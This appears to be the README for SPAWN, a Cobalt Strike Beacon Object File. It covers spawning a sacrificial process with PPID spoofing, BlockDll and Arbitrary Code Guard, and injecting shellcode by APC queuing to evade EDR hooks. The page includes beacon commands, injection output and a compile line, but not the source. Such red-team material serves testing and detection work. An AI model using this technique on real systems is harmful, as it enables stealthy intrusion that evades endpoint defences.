Home

Awesome

SPAWN - Cobalt Strike BOF

Cobalt Strike BOF that spawns a sacrificial process, injects it with shellcode, and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG), BlockDll, and PPID spoofing.

New Features (08/01/2021)

Popin' Calc from ACG Protected Process

beacon> spawn notepad.exe 6248 /Users/bobby.cooke/git/boku7/SPAWN/popCalc.bin
[*] SPAWN (Bobby Cooke//SpiderLabs|@0xBoku|github.com/boku7)
[+] Opened handle 0x534 to process 6248(PID)
[+] Spawned process: notepad.exe | PID: 8404 | PPID: 6248
[+] Allocated RE memory in remote process 8404 (PID) at: 0x00000177A72C0000
[+] Wrote 280 bytes to memory in remote process 8404 (PID) at 0x00000177A72C0000
[+] APC queued for main thread of 8404 (PID) to shellcode address 0x00000177A72C0000

New Features (07/19/2021)

beacon> help
    spawn                     Spawn a process with a spoofed PPID and blockDll
beacon> help spawn
Synopsis: spawn /path/to/exe PPID
beacon> ps
8264  5536  OneDrive.exe                 x86   1           DESKTOP-KOSR2NO\boku 
beacon> spawn cmd.exe 8264
[*] SPAWN (@0xBoku|github.com/boku7)
Opened handle 0x634 to process 8264(PID)
Success! Spawned process: cmd.exe | PID: 5384 | PPID: 8264

Compile with x64 MinGW:

x86_64-w64-mingw32-gcc -c spawn.x64.c -o spawn.x64.o

Run from Cobalt Strike Beacon Console

beacon> spawn /path/to/exe PPID /local/path/to/shellcode.bin

To Do List

Why did I build this?

1. To learn more about Cobalt Strike BOFs
2. I want flexibility in choosing my sacraficial processes.
3. I have allot of cool BOF ideas that I want to build on this.

Credits / References

PPID Spoofing & blockDll functionality
Raphael Mudge - Beacon Object Files - Luser Demo
Cobalt Strike - Beacon Object Files
BOF Code References
anthemtotheego/InlineExecute-Assembly
ajpc500/BOFs
trustedsec/CS-Situational-Awareness-BOF
Sektor7 Malware Dev Essentials course - learned how to do the early bird injection technique